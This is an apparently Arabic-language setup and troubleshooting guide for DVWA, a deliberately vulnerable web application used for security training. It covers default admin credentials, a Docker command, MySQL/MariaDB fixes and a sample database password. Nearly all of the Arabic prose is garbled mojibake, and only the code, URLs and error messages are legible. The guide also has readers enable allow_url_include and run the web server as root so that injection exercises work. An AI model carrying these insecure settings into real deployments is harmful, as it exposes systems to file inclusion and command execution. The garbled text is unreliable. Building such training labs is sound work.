اŲ„اŲØĒØąØ§ØļŲŠØŠ + +**اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… اŲ„اŲ„اŲØĒØąØ§ØļŲŠ = `admin`** + +**ŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą اŲ„اŲØĒØąØ§ØļŲŠØŠ = `password`** + +_...ŲŠŲ…ŲƒŲ† بØŗŲ‡ŲˆŲ„ØŠ ØĒØŽŲ…ŲŠŲ†Ų‡Ø§ باØŗØĒ؎داŲ… Ų‡ØŦŲˆŲ… Brute Force ;)_ + +ØąØ§Ø¨Øˇ ØĒØŗØŦŲŠŲ„ اŲ„د؎ŲˆŲ„ : http://127.0.0.1/login.php + +_Ų…Ų„احظ؊: ØŗŲŠØŽØĒŲ„Ų اŲ„ØąØ§Ø¨Øˇ ŲŲŠ حاŲ„ ØĒØĢبŲŠØĒ DVWA ŲŲŠ Ų…ØŗØ§Øą Ų…ØŽØĒŲ„Ų._ + +- - - + +## حاŲˆŲŠØŠ Docker + +- ŲŠŲ…ŲƒŲ†Ųƒ Ø˛ŲŠØ§ØąØŠ [dockerhub ØĩŲØ­ØŠ](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +ŲŠØąØŦŲ‰ اŲ„ØĒØŖŲƒØ¯ Ų…Ų† ØŖŲ†Ųƒ ØĒØŗØĒ؎دŲ… aufs بØŗبب Ų…شاŲƒŲ„ MySQL اŲ„ØŗابŲ‚ØŠ. Ų†ŲØ° اŲ„ØŖŲ…Øą `docker info` Ų„Ų„ØĒØ­Ų‚Ų‚ Ų…Ų† storage driver. ØĨذا Ų„Ų… ŲŠŲƒŲ† aufs ، ŲŠØąØŦŲ‰ ØĒØēŲŠŲŠØąŲ‡ ØšŲ„Ų‰ Ų‡Ø°Ø§ اŲ„Ų†Ø­Ųˆ. Ų‡Ų†Ø§Ųƒ ØŖدŲ„ØŠ Ų„ŲƒŲ„ Ų†Ø¸Ø§Ų… ØĒØ´ØēŲŠŲ„ Ø­ŲˆŲ„ ŲƒŲŠŲŲŠØŠ اŲ„Ų‚ŲŠØ§Ų… بذŲ„Ųƒ ، Ų„ŲƒŲ†Ų‡Ø§ Ų…ØŽØĒŲ„ŲØŠ ØĒŲ…اŲ…Ų‹Ø§ Ų„ذا Ų„Ų† Ų†ØēØˇŲŠ Ø°Ų„Ųƒ Ų‡Ų†Ø§. + +- - - + +## اØŗØĒŲƒØ´Ø§Ų اŲ„ØŖØŽØˇØ§ØĄ ŲˆØĨØĩŲ„احŲ‡Ø§ + +ŲŠŲØĒØąØļ Ų‡Ø°Ø§ ØŖŲ†Ųƒ ØĒØŗØĒ؎دŲ… ØĒŲˆØ˛ŲŠØšØŠ Ų‚اØĻŲ…ØŠ ØšŲ„Ų‰ Debian ، ŲƒŲ€ Debian Ųˆ Ubuntu Ųˆ Kali. باŲ„Ų†Øŗب؊ ØĨŲ„Ų‰ اŲ„ØĒŲˆØ˛ŲŠØšØ§ØĒ اŲ„ØŖØŽØąŲ‰ ، اØĒبؚ Ø°Ų„Ųƒ ، ŲˆŲ„ŲƒŲ† Ų‚Ų… بØĒؚدŲŠŲ„ اŲ„ØŖŲ…Øą ØšŲ†Ø¯ اŲ„ØļØąŲˆØąØŠ. + +### اŲ„Ø­ØĩŲˆŲ„ ØšŲ„Ų‰ اØŗØĒØŦاب؊ 404 ØšŲ†Ø¯ ØĒØĩŲØ­ اŲ„Ų…ŲˆŲ‚Øš + +ØĨذا ŲƒŲ†ØĒ ØĒŲˆØ§ØŦŲ‡ Ų‡Ø°Ų‡ اŲ„Ų…Ø´ŲƒŲ„ØŠ ، ŲØŖŲ†ØĒ بحاØŦØŠ ØĨŲ„Ų‰ ŲŲ‡Ų… Ų…ŲˆØ§Ų‚Øš اŲ„Ų…Ų„ŲØ§ØĒ. بشŲƒŲ„ اŲØĒØąØ§ØļŲŠ ، ØŦØ°Øą Ų…ØŗØĒŲ†Ø¯Ø§ØĒ Apache (Apache document root Ų‡Ųˆ اŲ„Ų…ŲƒØ§Ų† اŲ„Ø°ŲŠ ŲŠØ¨Ø¯ØŖ ŲŲŠŲ‡ اŲ„بحØĢ ØšŲ† Ų…Ø­ØĒŲˆŲ‰ اŲ„ŲˆŲŠØ¨) Ų‡Ųˆ `/var/www/html/` ØĨذا ŲˆØļØšØĒ اŲ„Ų…Ų„Ų `hello.txt` ŲŲŠ Ų‡Ø°Ø§ اŲ„Ų…ØŦŲ„د، ŲŠŲ…ŲƒŲ† اŲ„ŲˆØĩŲˆŲ„ ØĨŲ„ŲŠŲ‡ Ø¨ØˇŲ„ب `http://localhost/hello.txt` Ų…Ų† اŲ„Ų…ØĒØĩŲØ­. + +ØĨذا ØŖŲ†Ø´ØŖØĒ Ų…ØŦŲ„د ŲˆŲˆØļØšØĒ اŲ„Ų…Ų„Ų ŲŲŠŲ‡ - `/var/www/html/mydir/hello.txt` ŲŲŠŲ…ŲƒŲ†Ųƒ اŲ„ŲˆØĩŲˆŲ„ ØĨŲ„Ų‰ اŲ„Ų…Ų„Ų Ų…Ų† اŲ„ØŽŲ„اŲ„ اŲ„Ų…ØĒØĩŲØ­ Ø¨Ø˛ŲŠØ§ØąØŠ `http://localhost/mydir/hello.txt`. + +ŲŠØšØĒØ¨Øą Linux بشŲƒŲ„ اŲØĒØąØ§ØļŲŠ Ø­ØŗاØŗŲ‹Ø§ Ų„حاŲ„ØŠ اŲ„ØŖØ­ØąŲ ، ŲˆØ¨Ø§Ų„ØĒاŲ„ŲŠ ŲŲŠ اŲ„Ų…ØĢاŲ„ ØŖØšŲ„اŲ‡ ، ØĨذا حاŲˆŲ„ØĒ اŲ„ØĒØĩŲØ­ Ų„Ų„ŲˆØĩŲˆŲ„ ØĨŲ„Ų‰ ØŖŲŠ Ų…Ų† اŲ„ØąŲˆØ§Ø¨Øˇ اŲ„ØĒاŲ„ŲŠØŠØŒ ŲØŗØĒØ­ØĩŲ„ ØšŲ„Ų‰ `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +ŲƒŲŠŲ ŲŠØ¤ØĢØą Ø°Ų„Ųƒ ØšŲ„Ų‰ DVWA؟ ŲŠØŗØĒ؎دŲ… Ų…ؚظŲ… اŲ„ØŖش؎اØĩ git Ų„Ų„ØĒØ­Ų‚Ų‚ Ų…Ų† DVWA ŲŲŠ `/var/www/html` ، ŲˆŲ‡Ø°Ø§ ŲŠŲ…Ų†Ø­Ų‡Ų… اŲ„دŲ„ŲŠŲ„ `/var/www/html/DVWA/` Ų…ØĒØļŲ…Ų†ØŠ ØŦŲ…ŲŠØš Ų…Ų„ŲØ§ØĒ DVWA بدا؎Ų„Ų‡. ØĢŲ… ŲŠŲ‚ŲˆŲ…ŲˆŲ† Ø¨ØˇŲ„ب اŲ„ØąØ§Ø¨Øˇ `http://localhost/`Ų…Ų† اŲ„Ų…ØĒØĩŲØ­ ŲˆŲŠØ­ØĩŲ„ŲˆŲ† ØšŲ„Ų‰ 404 ØŖŲˆ اŲ„ØĩŲØ­ØŠ اŲ„اŲØĒØąØ§ØļŲŠØŠ ŲŲŠ Apache. Ų†Ø¸ØąŲ‹Ø§ Ų„ØŖŲ† اŲ„Ų…Ų„ŲØ§ØĒ Ų…ŲˆØŦŲˆØ¯ØŠ ŲŲŠ Ų…ØŦŲ„د DVWA ، ŲŠØŦب ØˇŲ„ب `http://localhost/DVWA`. + +اŲ„ØŽØˇØŖ اŲ„شاØĻØš اŲ„ØĸØŽØą Ų‡Ųˆ ØˇŲ„ب اŲ„ØąØ§Ø¨Øˇ `http://localhost/dvwa` ŲˆØ§Ų„Ø°ŲŠ ØŗŲŠØšØˇŲŠ` 404` Ų„ØŖŲ† `dvwa` Ų„ŲŠØŗ` DVWA` بØŗبب Ø­ØŗاØŗŲŠØŠ اŲ„ØŖØ­ØąŲ ŲŲŠ Linux. + +Ų„Ø°Ų„Ųƒ بؚد اŲ„ØĨؚداد ، ØĨذا حاŲˆŲ„ØĒ Ø˛ŲŠØ§ØąØŠ اŲ„Ų…ŲˆŲ‚Øš ŲˆØ§Ų„Ø­ØĩŲˆŲ„ ØšŲ„Ų‰ "404" ، ŲŲŲƒØą ŲŲŠ اŲ„Ų…ŲƒØ§Ų† اŲ„Ø°ŲŠ Ų‚Ų…ØĒ بØĒØĢبŲŠØĒ اŲ„Ų…Ų„ŲØ§ØĒ ŲŲŠŲ‡ ، ŲˆØŖŲŠŲ† ØĒØąØĒØ¨Øˇ باŲ„Ų…ØŗØ§Øą اŲ„ØŖØŗاØŗŲŠ ، ŲˆŲ…ا Ų‡Ųˆ اØŗŲ… اŲ„Ų…ØŦŲ„د اŲ„Ø°ŲŠ اØŗØĒ؎دŲ…ØĒŲ‡. + + +### Ų…Ø´ŲƒŲ„ØŠ "Access denied" + +ØĨذا ØąØŖŲŠØĒ Ų…ا ŲŠŲ„ŲŠ ØšŲ†Ø¯ ØĒØ´ØēŲŠŲ„ اŲ„Ø¨ØąŲ†Ø§Ų…ØŦ اŲ„Ų†ØĩŲŠ Ų„Ų„ØĨؚداد setup script ، ŲŲ‡Ø°Ø§ ŲŠØšŲ†ŲŠ ØŖŲ† اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… ØŖŲˆ ŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą ŲŲŠ Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† Ų„ا ŲŠØĒØˇØ§Ø¨Ų‚اŲ† Ų…Øš ØĒŲ„Ųƒ اŲ„ØĒŲŠ ØĒŲ… ØĒŲƒŲˆŲŠŲ†Ų‡Ø§ ŲŲŠ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +ŲŠØŽØ¨ØąŲƒ اŲ„ØŽØˇØŖ ØŖŲ† اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… Ų‡Ųˆ `notdvwa`. + +ŲŠØ´ŲŠØą اŲ„ØŽØˇØŖ اŲ„ØĒاŲ„ŲŠ ØĨŲ„Ų‰ ØŖŲ†Ųƒ ŲˆØŦŲ‡ØĒ Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† ØĨŲ„Ų‰ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ اŲ„ØŽØ§ØˇØĻØŠ. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +ØąØŗاŲ„ØŠ اŲ„ØŽØˇØŖ ØĒŲˆØļØ­ ØŖŲ†Ųƒ ØĒØŗØĒ؎دŲ… اŲ„Ų…ØŗØĒ؎دŲ… `dvwa` ŲˆØĒحاŲˆŲ„ اŲ„اØĒØĩاŲ„ بŲ‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ `notdvwa`. + +ØŖŲˆŲ„ Ų…ا ŲŠØŦب اŲ„Ų‚ŲŠØ§Ų… بŲ‡ Ų‡Ųˆ اŲ„ØĒØ­Ų‚Ų‚ Ų…ØąØŠ ØŖØŽØąŲ‰ Ų…Ų…ا ØĒØšØĒŲ‚د ØŖŲ†Ųƒ Ų‚د ŲˆØļØšØĒŲ‡ ŲŲŠ Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† ØĩØ­ŲŠØ­ ŲˆŲ…ØˇØ§Ø¨Ų‚ Ų„Ų„بŲŠØ§Ų†Ø§ØĒ اŲ„ŲØšŲ„ŲŠØŠ. + +ØĨذا ŲƒØ§Ų† ŲŠØĒØˇØ§Ø¨Ų‚ Ų…Øš Ų…ا ØĒØĒŲˆŲ‚ØšŲ‡ ، ŲØĨŲ† اŲ„Ø´ŲŠØĄ اŲ„ØĒاŲ„ŲŠ اŲ„Ø°ŲŠ ŲŠØŦب ŲØšŲ„Ų‡ Ų‡Ųˆ اŲ„ØĒØ­Ų‚Ų‚ Ų…Ų† ØŖŲ†Ų‡ ŲŠŲ…ŲƒŲ†Ųƒ ØĒØŗØŦŲŠŲ„ اŲ„د؎ŲˆŲ„ ŲƒŲ…ØŗØĒ؎دŲ… ŲŲŠ Ų…Ø­ØąØą اŲ„ØŖŲˆØ§Ų…Øą command line. باŲØĒØąØ§Øļ ØŖŲ† Ų„دŲŠŲƒ Ų…ØŗØĒ؎دŲ… Ų‚اؚد؊ بŲŠØ§Ų†Ø§ØĒ Ų„Ų€ `dvwa` ŲˆŲƒŲ„Ų…ØŠ Ų…ØąŲˆØą Ų‡ŲŠ `p@ssw0rd`، Ų‚Ų… بØĒŲ†ŲŲŠØ° اŲ„ØŖŲ…Øą اŲ„ØĒاŲ„ŲŠ: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*Ų…Ų„احظ؊: Ų„ا ŲŠŲˆØŦد Ų…ØŗاŲØŠ بؚد -p* + +ØĨذا ظŲ‡Øą اŲ„ØŽØąØŦ اŲ„ØĒاŲ„ŲŠØŒ ŲŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą ØĩØ­ŲŠØ­ØŠ: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Ų†Ø¸ØąŲ‹Ø§ Ų„ØŖŲ†Ų‡ ŲŠŲ…ŲƒŲ†Ųƒ اŲ„اØĒØĩاŲ„ ŲŲŠ ØŗØˇØą اŲ„ØŖŲˆØ§Ų…Øą ، ŲŲ…Ų† اŲ„Ų…Ø­ØĒŲ…Ų„ ØŖŲ† ŲŠŲƒŲˆŲ† Ų‡Ų†Ø§Ųƒ ØŽØˇØŖ Ų…ا ŲŲŠ Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† ، ØĒØ­Ų‚Ų‚ Ų…ØąØŠ ØŖØŽØąŲ‰ Ų…Ų† Ø°Ų„Ųƒ ØĢŲ… Ų‚Ų… بØĨŲ†Ø´Ø§ØĄ ØĒØ°ŲƒØąØŠ Ų„Ų„Ų…Ø´ŲƒŲ„ØŠ ØĨذا ŲƒŲ†ØĒ Ų„ا ØĒØ˛Ø§Ų„ ØēŲŠØą Ų‚Ø§Ø¯Øą ØšŲ„Ų‰ اŲ„ØĒØ´ØēŲŠŲ„. +ØĨذا ØąØŖŲŠØĒ Ų…ا ŲŠŲ„ŲŠ ، ŲØĨŲ† اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… ØŖŲˆ ŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą اŲ„ØĒŲŠ ØĒØŗØĒ؎دŲ…Ų‡Ø§ ØēŲŠØą ØĩØ­ŲŠØ­ØŠ. ŲƒØąØą ØŽØˇŲˆØ§ØĒ [ØĨؚداد Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ](#ØĨؚداد-Ų‚اؚد؊-اŲ„بŲŠØ§Ų†Ø§ØĒ) ŲˆØĒØŖŲƒØ¯ Ų…Ų† اØŗØĒ؎داŲ… اØŗŲ… اŲ„Ų…ØŗØĒ؎دŲ… ŲˆŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą Ų†ŲØŗŲ‡Ų…ا ØˇŲˆØ§Ų„ اŲ„ØšŲ…Ų„ŲŠØŠ. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +ØĨذا Ø­ØĩŲ„ØĒ ØšŲ„Ų‰ Ų…ا ŲŠŲ„ŲŠ ، ŲØĨŲ† بŲŠØ§Ų†Ø§ØĒ اŲ„د؎ŲˆŲ„ ØĩØ­ŲŠØ­ØŠ ŲˆŲ„ŲƒŲ† Ų„ŲŠØŗ Ų„دŲ‰ اŲ„Ų…ØŗØĒ؎دŲ… Ø­Ų‚ اŲ„ŲˆØĩŲˆŲ„ ØĨŲ„Ų‰ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ. Ų…ØąØŠ ØŖØŽØąŲ‰ ، ŲƒØąØą ØŽØˇŲˆØ§ØĒ اŲ„ØĨؚداد ŲˆØĒØ­Ų‚Ų‚ Ų…Ų† اØŗŲ… Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ اŲ„ØĒŲŠ ØĒØŗØĒ؎دŲ…Ų‡Ø§. +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +اŲ„ØŽØˇØŖ اŲ„Ų†Ų‡Ø§ØĻŲŠ اŲ„Ø°ŲŠ ŲŠŲ…ŲƒŲ† ØŖŲ† ØĒØ­ØĩŲ„ ØšŲ„ŲŠŲ‡ Ų‡Ųˆ : + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Ų‡Ø°Ų‡ Ų„ŲŠØŗØĒ Ų…Ø´ŲƒŲ„ØŠ Ų…ØĩادŲ‚ØŠ ŲˆŲ„ŲƒŲ†Ų‡Ø§ ØĒØŽØ¨ØąŲƒ ØŖŲ† ؎ادŲ… Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ Ų„ا ŲŠØšŲ…Ų„. ŲŠŲ…ŲƒŲ†Ųƒ ØĒØ´ØēŲŠŲ„Ų‡ بØĒŲ†ŲŲŠØ° اŲ„ØŖŲ…Øą اŲ„ØĒاŲ„ŲŠ + +```sh +sudo service mysql start +``` + +### Ų…Ø´ŲƒŲ„ØŠ Unknown authentication method + +Ų…Øš ØŖحدØĢ ØĨØĩØ¯Ø§ØąØ§ØĒ MySQL ، Ų„Ų… ŲŠØšØ¯ بØĨŲ…ŲƒØ§Ų† PHP اŲ„اØĒØĩاŲ„ بŲ‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ŲŲŠ ØĒŲƒŲˆŲŠŲ†Ų‡Ø§ اŲ„اŲØĒØąØ§ØļŲŠ. ØĨذا حاŲˆŲ„ØĒ ØĒØ´ØēŲŠŲ„ اŲ„Ø¨ØąŲ†Ø§Ų…ØŦ اŲ„Ų†ØĩŲŠ Ų„Ų„ØĨؚداد setup script ŲˆØĒŲ„Ų‚ŲŠØĒ اŲ„ØąØŗاŲ„ØŠ اŲ„jاŲ„ŲŠØŠ ، ŲŲ‡Ø°Ø§ ŲŠØšŲ†ŲŠ ØŖŲ†Ų‡ ØšŲ„ŲŠŲƒ ØĨØŦØąØ§ØĄ بؚØļ اŲ„ØĒؚدŲŠŲ„اØĒ ØšŲ„Ų‰ اŲ„ØĒŲƒŲˆŲŠŲ†. +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Ų„دŲŠŲƒ ØŽŲŠØ§ØąØ§Ų† ، ØŖØŗŲ‡Ų„Ų‡Ų…ا Ų‡Ųˆ ØĨŲ„ØēØ§ØĄ ØĒØĢبŲŠØĒ MySQL ŲˆØĒØĢبŲŠØĒ MariaDB. ØĒØŦد ŲŲŠ اŲ„ØąØ§Ø¨Øˇ اŲ„ØĒاŲ„ŲŠ اŲ„دŲ„ŲŠŲ„ اŲ„ØąØŗŲ…ŲŠ Ų„Ų…Ø´ØąŲˆØš MariaDB: + + + +بدŲ„اŲ‹ Ų…Ų† Ø°Ų„ŲƒØŒ اØĒبؚ اŲ„ØŽØˇŲˆØ§ØĒ اŲ„ØĒاŲ„ŲŠØŠ: + +1- باØŗØĒ؎داŲ… اŲ„Ø­Øŗاب root، ؚدŲ„ اŲ„Ų…Ų„Ų اŲ„ØĒاŲ„ŲŠ: `/etc/mysql/mysql.conf.d/mysqld.cnf`. + +2- ØŖØļŲ Ų…ا ŲŠŲ„ŲŠ ØĒØ­ØĒ Ų„اØŗØˇØą `[mysqld]`: + `default-authentication-plugin=mysql_native_password` + +3- ØŖؚد ØĒØ´ØēŲŠŲ„ ؎دŲ…ØŠ Ų‚ŲˆØ§ØšØ¯ اŲ„بŲŠØ§Ų†Ø§ØĒ: `sudo service mysql restart`. + +4- ØĒØŽŲ‚Ų‚ Ų…Ų† ØˇØąŲŠŲ‚ØŠ اŲ„Ų…ØĩادŲ‚ØŠ اŲ„؎اØĩØŠ بحØŗاب Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ: + + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + + +5- Ų…Ų† اŲ„Ų…ØąØŦØ­ ØŖŲ†Ų‡Ø§ `caching_sha2_password`، ØĨذا ŲƒØ§Ų† ŲƒØ°Ų„ŲƒØŒ Ų†ŲØ° Ų…ا ŲŠŲ„ŲŠ: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + + +6- ØĒØ­Ų‚Ų‚ Ų…ØŦدداŲ‹ØŒ ŲŠØŦب ØŖŲ† ØĒØĩبح اŲ„ØĸŲ† `mysql_native_password` . + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +بؚد ŲƒŲ„ Ų…ا ØŗبŲ‚ØŒ ŲŠØŦب ØŖŲ† ØĒØšŲ…Ų„ ØšŲ…Ų„ŲŠØŠ اŲ„ØĨؚدد بحاŲ„ØĒŲ‡Ø§ اŲ„ØˇØ¨ŲŠØšŲŠØŠ. + +ØĨذا ŲƒŲ†ØĒ ØĒØąŲŠØ¯ اŲ„Ų…Ø˛ŲŠØ¯ Ų…Ų† اŲ„Ų…ØšŲ„ŲˆŲ…اØĒ ŲŠØąØŦŲ‰ اŲ„Ø§ØˇŲ„اؚ ØšŲ„Ų‰: . + +### Ų…Ø´ŲƒŲ„ØŠ Database Error #2002: No such file or directory. + +ØĨذا ŲƒØ§Ų† ؎ادŲ… Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ Ų„ا ŲŠØšŲ…Ų„. ŲˆŲƒŲ†ØĒ ØĒØŗ؎دŲ… ØĒŲˆØ˛ŲŠØšØŠ Ų…بŲ†ŲŠØŠ ØšŲ„Ų‰ Debian، ŲŠŲ…ŲƒŲ† اŲ„Ų‚ŲŠØ§Ų… بذŲ„Ųƒ باØŗØĒ؎داŲ…: + +```sh +sudo service mysql start +``` + +### Ų…ؚاŲ„ØŦØŠ اŲ„ØŖØŽØˇØ§ØĄ "MySQL server has gone away" Ųˆ "Packets out of order" + +Ų‡Ų†Ø§Ųƒ ؚد؊ ØŖØŗباب Ų„حدŲˆØĢ Ų‡Ø°Ų‡ اŲ„ØŖØŽØˇØ§ØĄ ، ŲˆŲ„ŲƒŲ† اŲ„Øŗبب اŲ„Ų…ØąØŦØ­ Ų‡Ųˆ ؚدŲ… ØĒŲˆØ§ŲŲ‚ ØĨØĩØ¯Ø§Øą ؎ادŲ… Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ Ų…Øš ØĨØĩØ§Øą PHP. + +ŲˆŲ‡Ųˆ اŲ„ØŖŲƒØĢØą Ø´ŲŠŲˆØšŲ‹Ø§ ØšŲ†Ø¯ ØĒØ´ØēŲŠŲ„ ØŖحدØĢ ØĨØĩØ¯Ø§Øą Ų…Ų† MySQL Ųˆ PHP ، Ų„ا ŲŠØšŲ…Ų„ اŲ„ØĒØˇØ¨ŲŠŲ‚ بشŲƒŲ„ ØŦŲŠØ¯. ŲˆŲ„Ø°Ų„Ųƒ Ų†Ų†ØĩØ­ باØŗØĒبداŲ„ MySQL بŲ€ MariaDB Ų„ØŖŲ† Ų‡Ø°Ų‡ اŲ„Ų…Ø´ŲƒŲ„ØŠ Ų„ا ŲŠŲˆØŦد دؚŲ… Ų„Ų‡Ø§ ŲŲŠ اŲ„ŲˆŲ‚ØĒ اŲ„حاŲ„ŲŠ. + +Ų„Ų…Ø˛ŲŠØ¯ Ų…Ų† اŲ„Ų…ØšŲ„ŲˆŲ…اØĒ، ŲŠØąØŦŲ‰ اŲ„Ø§ØˇŲ„اؚ ØšŲ„Ų‰: + + + +### Ų„ا ŲŠØšŲ…Ų„ Ø­Ų‚Ų† SQL باØŗØĒ؎داŲ… PHP v5.2.6 + +ØĒŲˆŲ‚Ų دؚŲ… PHP 5.x Ų…Ų†Ø° ŲŠŲ†Ø§ŲŠØą 2019 ، Ų„Ø°Ų„Ųƒ Ų†ŲˆØĩŲŠ بØĒØ´ØēŲŠŲ„ DVWA بØĨØĩØ¯Ø§Øą 7.x اŲ„حاŲ„ŲŠ ، ØĨذا ŲƒŲ†ØĒ Ų…ØļØˇØąØ§Ų‹ Ų„اØŗØĒ؎داŲ… اŲ„ØĨØĩØ¯Ø§Øą 5.x .. + +ØĨذا ŲƒŲ†ØĒ ØĒØŗØĒ؎دŲ… ØĨØĩØ¯Ø§Øą PHP v5.2.6 ØŖŲˆ ØŖحدØĢ ، ŲØŗØĒØ­ØĒاØŦ ØĨŲ„Ų‰ اŲ„Ų‚ŲŠØ§Ų… بŲ…ا ŲŠŲ„ŲŠ Ø­ØĒŲ‰ ŲŠØšŲ…Ų„ Ø­Ų‚Ų† SQL ŲˆØ§Ų„ØĢØēØąØ§ØĒ اŲ„ØŖŲ…Ų†ŲŠØŠ اŲ„ØŖØŽØąŲ‰. + +اØŗØĒبدŲ„ اŲ„ØĸØĒŲŠ ŲŲŠ Ų…Ų„Ų `htaccess.`: + +```php + + php_flag magic_quotes_gpc off + #php_flag allow_url_fopen on + #php_flag allow_url_include on + +``` + +بŲ‡Ø°Ø§: + +```php + + magic_quotes_gpc = Off + allow_url_fopen = On + allow_url_include = On + +``` + +### ŲØ´Ų„ Ø­Ų‚Ų† اŲ„ØŖŲˆØ§Ų…Øą Command Injection +Ų‚د Ų„ا ŲŠŲƒŲˆŲ† Ų„دŲ‰ Apache اŲ…ØĒŲŠØ§Ø˛Ø§ØĒ ؚاŲ„ŲŠØŠ ŲƒØ§ŲŲŠØŠ Ų„ØĒŲ†ŲŲŠØ° اŲ„ØŖŲˆØ§Ų…Øą ØšŲ„Ų‰ ؎ادŲ… اŲ„ŲˆŲŠØ¨. ØĨذا ŲƒŲ†ØĒ ØĒŲ‚ŲˆŲ… بØĒØ´ØēŲŠŲ„ DVWA ØšŲ„Ų‰ Ų†Ø¸Ø§Ų… Linux ، ŲØĒØŖŲƒØ¯ Ų…Ų† ØĒØŗØŦŲŠŲ„ اŲ„د؎ŲˆŲ„ ŲƒŲ…ØŗØĒ؎دŲ… root. ØŖŲ…ا ŲŲŠ Windows Ų‚Ų… بØĒØŗØŦŲŠŲ„ اŲ„د؎ŲˆŲ„ ŲƒŲ€ administrator. + +### Ų„Ų…اذا Ų„ا ŲŠŲ…ŲƒŲ† اŲ„اØĒØĩاŲ„ بŲ‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ŲŲŠ CentOS؟ + +Ų‚د ØĒŲˆØ§ØŦŲ‡ Ų…شاŲƒŲ„ Ų…Øš SELinux، Ų‚Ų… ØĨŲ…ا بØĒØšØˇŲŠŲ„ SELinux ØŖŲˆ ØĒØ´ØēŲŠŲ„ Ų‡Ø°Ø§ اŲ„ØŖŲ…Øą Ų„Ų„ØŗŲ…اح Ų„؎ادŲ… اŲ„ŲˆŲŠØ¨ باŲ„ØĒØŽØ§ØˇØ¨ Ų…Øš Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Ų„ØŖŲŠ Ų…Ø´ŲƒŲ„ØŠ ØŖØŽØąŲ‰ + +Ų„Ų„Ø­ØĩŲˆŲ„ ØšŲ„Ų‰ ØŖحدØĢ Ų…ØšŲ„ŲˆŲ…اØĒ اØŗØĒŲƒØ´Ø§Ų اŲ„ØŖØŽØˇØ§ØĄ ŲˆØĨØĩŲ„احŲ‡Ø§ ، ŲŠØąØŦŲ‰ Ų‚ØąØ§ØĄØŠ ŲƒŲ„ Ų…Ų† اŲ„ØĒذاŲƒØą اŲ„Ų…ŲØĒŲˆØ­ØŠ ŲˆØ§Ų„Ų…ØēŲ„Ų‚ØŠ ŲŲŠ اŲ„ØąŲŠØ¨Ųˆ git repo: + + + +Ų‚بŲ„ ØĨØąØŗاŲ„ اŲ„ØĒØ°ŲƒØąØŠ ، ŲŠØąØŦŲ‰ اŲ„ØĒØŖŲƒØ¯ Ų…Ų† ØĒØ´ØēŲŠŲ„ ØŖحدØĢ ØĨØĩØ¯Ø§Øą Ų…Ų† اŲ„ŲƒŲˆØ¯ Ų…Ų† اŲ„ØąŲŠØ¨Ųˆ. Ų‡Ø°Ø§ Ų„ŲŠØŗ ØŖحدØĢ ØĨØĩØ¯Ø§Øą ، Ų‡Ø°Ø§ Ų‡Ųˆ ØŖحدØĢ ŲƒŲˆØ¯ Ų…Ų† اŲ„ŲØąØš اŲ„ØąØĻŲŠØŗŲŠ master branch . + +ŲŲŠ حاŲ„ØŠ ØĨŲ†Ø´Ø§ØĄ ØĒØ°ŲƒØąØŠ ، ŲŠØąØŦŲ‰ ØĒŲ‚دŲŠŲ… اŲ„Ų…ØšŲ„ŲˆŲ…اØĒ اŲ„ØĒاŲ„ŲŠØŠ ØšŲ„Ų‰ 